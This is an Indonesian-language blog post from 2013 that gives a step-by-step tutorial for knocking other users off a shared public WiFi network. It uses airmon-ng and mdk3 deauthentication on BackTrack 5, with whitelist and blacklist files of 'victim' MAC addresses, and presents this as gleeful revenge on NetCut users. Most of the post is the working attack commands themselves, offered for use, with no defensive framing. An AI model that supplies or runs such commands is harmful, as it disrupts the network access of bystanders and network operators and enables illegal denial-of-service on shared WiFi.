Posted by : Unknown Tuesday, December 24, 2013

Hai guys, ketemu lagi dengan saya sih Admin Kece :v haha. suka pake wifi gratis? tapi sering kesel sama orang yg menggunakan netcut??, mereka jahilin kita, dan saat nya kita jahilin balik huahaha #Aura Jahat keluar


gak pake lama, langsung saja kita ke TKP biar puas jailin Pengguna Netcut

kebetulan admin pake  BT5 R3, modul mdk3 (sudah ad di BT5). langsung aja ya gan.
1. cek mac address wireless agan dulu pake ifconfig, contohnya gini
# ifconfig wlan0
2. simpan mac address agan di file whitelist.txt (atau yg lain, terserah)
# echo mac_address_agan > whitelist.txt
3. aktifin mode monitor di wireless, ntar muncul interface baru (mon0)
# airmon-ng start wlan0
4. jalanin deh mdk3-nya
# mdk3 mon0 d -w whitelist.txt

ntar semua yg lagi connect langsung disconnect, kecuali punya agan. kalo misalnya agan cuma mau diskonekin punya satu/dua orang aja, buat file blacklist.txt yang isinya mac address korban (1 mac address/baris), trus jalanin mdk3-nya pake
# mdk3 mon0 d -b blacklist.txt

aduh, ada banyak Access Point disini.. kalo mau nge-kick user di satu AP aja, silakan cek AP itu pake channel berapa. sintaks mdk3nya jadi
# mdk3 mon0 -c channel_berapa d -w whitelist.txt
atau
# mdk3 mon0 -c channel_berapa d -b blacklist.txt

Rasakan buat pengguna NetCut Huhahahaa #Pasang lirikan tajam

Leave a Reply

Subscribe to Posts | Subscribe to Comments

Powered by Blogger.
Load Counter

Popular Post

Labels

About Us

- Copyright © 2013 メ Welkom Para Tamfan メ -Metrominimalist- Powered by Blogger - Designed by Johanes Djogan -